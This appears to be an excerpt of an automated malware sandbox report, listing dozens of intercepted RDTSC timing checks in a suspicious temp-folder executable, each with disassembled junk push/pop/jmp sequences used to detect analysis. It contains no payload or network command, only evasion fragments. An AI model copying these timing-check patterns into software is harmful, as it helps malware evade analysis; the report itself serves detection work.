Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CC3C9E second address: CC3CA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D02791 second address: D027A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9F53C6A7Ch 0x00000009 jnl 00007FC9F53C6A76h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D027A7 second address: D027B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 ja 00007FC9F53DFD56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D02A45 second address: D02A49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D02A49 second address: D02A4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D0A5DB second address: D0A5E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jnp 00007FC9F53C6A76h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D0A5E9 second address: D0A614 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jng 00007FC9F53DFD56h 0x0000000f push esi 0x00000010 pop esi 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 popad 0x00000014 jmp 00007FC9F53DFD67h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D0A8E0 second address: D0A8E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D0A8E4 second address: D0A8EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D09FF5 second address: D0A009 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC9F53C6A76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jp 00007FC9F53C6A76h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D0A009 second address: D0A034 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9F53DFD64h 0x00000009 jmp 00007FC9F53DFD63h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D0A034 second address: D0A061 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A7Bh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 pop esi 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 je 00007FC9F53C6A76h 0x0000001c push esi 0x0000001d pop esi 0x0000001e pop esi 0x0000001f jbe 00007FC9F53C6A78h 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D0A061 second address: D0A069 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D0A069 second address: D0A06D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D0AD29 second address: D0AD3E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FC9F53DFD5Ch 0x00000008 pushad 0x00000009 popad 0x0000000a pop esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D0B00C second address: D0B026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 jng 00007FC9F53C6A7Ch 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D0D7E7 second address: D0D7EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D0D7EB second address: D0D7F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D0D7F1 second address: D0D7F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D0D7F7 second address: D0D7FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D0D7FC second address: D0D822 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC9F53DFD69h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D0D822 second address: D0D82E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007FC9F53C6A76h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D0D82E second address: D0D832 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D0FECC second address: D0FED0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D0FED0 second address: D0FEF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC9F53DFD56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007FC9F53DFD63h 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D1000A second address: D10027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007FC9F53C6A84h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D14A19 second address: D14A1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D14A1F second address: D14A37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC9F53C6A80h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C7FC76 second address: C7FC7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C7FC7C second address: C7FC84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C7FC84 second address: C7FC8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C7FC8F second address: C7FC93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C7FC93 second address: C7FC99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D17619 second address: D17621 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D17779 second address: D177B1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jl 00007FC9F53DFD56h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push esi 0x0000000e jnp 00007FC9F53DFD56h 0x00000014 pop esi 0x00000015 push ecx 0x00000016 push eax 0x00000017 pop eax 0x00000018 pop ecx 0x00000019 pushad 0x0000001a jnl 00007FC9F53DFD56h 0x00000020 jmp 00007FC9F53DFD66h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D19555 second address: D19564 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 jnc 00007FC9F53C6A76h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CC3967 second address: CC396C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CC396C second address: CC398D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC9F53C6A86h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CC398D second address: CC3993 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CC3993 second address: CC39CD instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC9F53C6A76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov cx, ax 0x00000010 push 00000004h 0x00000012 mov cx, 0F8Bh 0x00000016 adc cx, 6231h 0x0000001b nop 0x0000001c jmp 00007FC9F53C6A84h 0x00000021 push eax 0x00000022 jc 00007FC9F53C6A7Eh 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D1DF17 second address: D1DF1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D1DF1E second address: D1DF3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A88h 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D274D4 second address: D2750B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FC9F53DFD5Ah 0x0000000f push edi 0x00000010 pop edi 0x00000011 pushad 0x00000012 popad 0x00000013 pop edi 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC9F53DFD67h 0x0000001c push ebx 0x0000001d pop ebx 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D25604 second address: D2560A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D2560A second address: D2560E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D2560E second address: D25612 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D25E09 second address: D25E0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D25E0D second address: D25E1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007FC9F53C6A76h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D25E1F second address: D25E23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D260C7 second address: D260CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D260CB second address: D260FB instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC9F53DFD56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FC9F53DFD62h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC9F53DFD5Eh 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D260FB second address: D260FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D260FF second address: D2610B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jns 00007FC9F53DFD56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D2610B second address: D26125 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9F53C6A86h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D26125 second address: D26137 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC9F53DFD56h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D263C0 second address: D263C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D26644 second address: D26648 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D268FA second address: D268FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D268FE second address: D26908 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D26BD8 second address: D26BE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D2A277 second address: D2A281 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC9F53DFD56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D2A281 second address: D2A287 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D2A553 second address: D2A55D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC9F53DFD56h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D2A6BE second address: D2A6D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC9F53C6A81h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D2F701 second address: D2F705 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D2F705 second address: D2F70B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D36432 second address: D36462 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC9F53DFD61h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push edi 0x00000012 pop edi 0x00000013 jmp 00007FC9F53DFD5Ah 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b push ebx 0x0000001c pushad 0x0000001d popad 0x0000001e pop ebx 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D368A8 second address: D368F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC9F53C6A87h 0x00000009 pop ebx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e jmp 00007FC9F53C6A83h 0x00000013 pop edx 0x00000014 push esi 0x00000015 jmp 00007FC9F53C6A85h 0x0000001a pop esi 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D36E25 second address: D36E2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D37263 second address: D37268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D35F75 second address: D35FCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jmp 00007FC9F53DFD5Eh 0x0000000b jnp 00007FC9F53DFD56h 0x00000011 pop ebx 0x00000012 push ebx 0x00000013 jmp 00007FC9F53DFD62h 0x00000018 jmp 00007FC9F53DFD5Ch 0x0000001d pop ebx 0x0000001e pushad 0x0000001f jmp 00007FC9F53DFD69h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D35FCC second address: D35FD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D35FD2 second address: D35FE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jp 00007FC9F53DFD56h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D35FE3 second address: D35FED instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC9F53C6A76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D3C817 second address: D3C831 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jmp 00007FC9F53DFD63h 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D3C831 second address: D3C84F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FC9F53C6A76h 0x00000009 ja 00007FC9F53C6A76h 0x0000000f jne 00007FC9F53C6A76h 0x00000015 popad 0x00000016 jbe 00007FC9F53C6A7Eh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D3C84F second address: D3C880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jl 00007FC9F53DFD5Eh 0x0000000f je 00007FC9F53DFD56h 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a jnl 00007FC9F53DFD56h 0x00000020 jo 00007FC9F53DFD56h 0x00000026 jnc 00007FC9F53DFD56h 0x0000002c popad 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D3C880 second address: D3C886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D3C886 second address: D3C88A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D3C88A second address: D3C88E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D42157 second address: D4218A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC9F53DFD56h 0x0000000a popad 0x0000000b jl 00007FC9F53DFD5Eh 0x00000011 pushad 0x00000012 popad 0x00000013 je 00007FC9F53DFD56h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FC9F53DFD66h 0x00000020 push ebx 0x00000021 pop ebx 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D4218A second address: D421A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D41B90 second address: D41BA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD63h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D41BA9 second address: D41BAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D4F450 second address: D4F466 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD60h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D4F466 second address: D4F46C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D4F46C second address: D4F470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D533F6 second address: D533FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D533FA second address: D53418 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC9F53DFD63h 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
